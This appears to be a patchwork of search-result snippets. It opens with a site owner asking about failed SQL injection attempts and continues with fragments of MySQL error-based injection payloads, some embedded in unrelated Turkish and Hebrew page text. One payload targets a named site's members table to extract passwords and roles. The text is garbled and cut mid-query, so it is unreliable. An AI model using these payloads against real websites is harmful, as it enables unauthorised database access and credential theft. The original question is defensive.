I have detected some failed SQL injection attacks on my website. The failed queries are of the form: … The ':sjw:1:ukt:1' part is specially constructed with variables concatenated together to give random 0s...
concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)). from `information_schema`.tables limit 0,1),floor(rand(0)*2))x. from `information_schema`.tables group by x)a)
...(select (case when (7082=7082) then 1 else 0 end)),0x716b717a71,floor(rand(0)*2))x from information_schema.character_sets group
...CONCAT(1,(SELECT (SELECT CONCAT(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)/wnvCpgrV.
...AND (SELECT 4788 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(4788=4788,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a).
Şair Fdsfa Fdsa Fsdf isimli şaire ait 9785073 or (select 1 from (select count(*),concat((0x574352575653),0x5E,floor(rand(0)*2)) x from information_schema.tables group by x)a) adlı şiiri okumak için bu sayfayı ziyaret edebilirsiniz.
mysql> SELECT CONCAT_WS(',','First name','Second name','Last Name')
(select 1 from(select count(*), concat(( select( select unhex(hex
and (select 1 from (select count(*),concat((select(select concat(cast(concat(mm_pwd,0x7e,mm_role) as char),0x7e)) from lpsschoo.members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and+extractvalue(rand...
לא נמצאו תוצאות עבור הביטוי לגננת) AND (SELECT 2659 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(2659=2659,1))),0x716a787671,FLOOR(RAND(0)*2))x FROM...